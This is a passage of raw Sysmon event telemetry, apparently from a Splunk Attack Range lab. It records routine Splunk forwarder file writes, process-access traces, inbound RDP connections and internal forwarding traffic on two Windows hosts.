Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC5650092D7E20D2124F51A44991BE69,SHA256=7ACA065DB40E6D4A38C9207E995D543678B99E4531FBDA6DB9A2F2043C33EA56,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979309Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:18.429{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62348-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979308Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:21.509{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B53B975CF82DE1147DA77B740435C5D,SHA256=0F1AF2E6E8FBCC721E00522B63FEFADA5F955A67ED1792C93EDDD6AF5C9BF635,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:18.917{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63614-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:22.599{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AE52332C0955F75D25FBBBCC5DBAFD,SHA256=3551A2B31F83D0C12D487B79CE21986D396D56F6F488A3ED0C05BC3BC867EB33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979310Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:22.212{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC7194496CB98195A7696876742AE8F8,SHA256=22AECDA783FF8740AAF526828855E0AC280CBE09ED9CE2D995F9E8D0F5988560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:23.618{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F504AFFA4019E51997FF982E358F51BB,SHA256=CB292A7AA88F76C521C425329EA91B5798BC543079BA6776154D7FB7E37CDCAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979311Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:23.244{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7DE0D619C5D97C44ABD3909B5773D4C,SHA256=06F4B66E5BE5B4F3F539B0E8D0810B40BD57B18860EDF850FFC0A707023E3BC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:24.619{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021AE9BF09BBC2A043FA6168D8B5F4BD,SHA256=1EA5AD5889C844F4A2C2CC58A1DEB2709153DD2A792B16E8D1F8EBABD14B1215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979315Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:24.947{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F275CD4A1EAF561BD4230EFD2B8CBC6F,SHA256=5778C38DF7C28744D1666F1C53E84B7F13DE0C2CED005F684C5ABB3BA21BA825,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979314Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:22.256{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com38849-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979313Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:21.744{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59415-false10.0.1.12-8000- 23542300x8000000000000000979312Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:24.275{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0092BF45B20B12FA480AC46DE495DE5E,SHA256=6F7CC1782AE3A02A017BAB6FFE0D2136939FBBDDCD8F847E56CA819C95A3EAFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:25.649{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B2D95FD407AB516E5692A23CEE76898,SHA256=F3412263E6D2AF77D4E908C39949A109EBE0A47C5A2A4FF809A458FF29724591,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979330Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.978{69CF5F33-8B71-6151-D579-00000000FD01}9561224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979329Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979328Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979327Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979326Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979325Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979324Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979323Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979322Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979321Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B71-6151-D579-00000000FD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979320Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979319Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.712{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8B71-6151-D579-00000000FD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979318Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.697{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B71-6151-D579-00000000FD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979317Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.697{69CF5F33-8B71-6151-D579-00000000FD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979316Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:25.275{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05BA1C492BC69BC0FCBDAA9706B40B02,SHA256=B2949C81A0A3889E146D03DC2DE09A8161C54AD4485B5ECC5EC47CB9874CD53B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:22.941{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53403-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:26.680{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F0428E64DE1D3939A32EA76CC67F01B,SHA256=7F2AC73D708626897779E2B895015BA338CFC26A90A2E85884A22908E4E7BC0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979346Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.869{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1813D88830D19E636BF150B65F7B19BA,SHA256=A0F48014F568F2B0A5D51699CC04885023F3FD0D59D188C2091FB8197582982D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979345Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.525{69CF5F33-8B72-6151-D679-00000000FD01}3640324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979344Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B72-6151-D679-00000000FD01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979343Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979342Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979341Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.400{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8B72-6151-D679-00000000FD01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979340Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 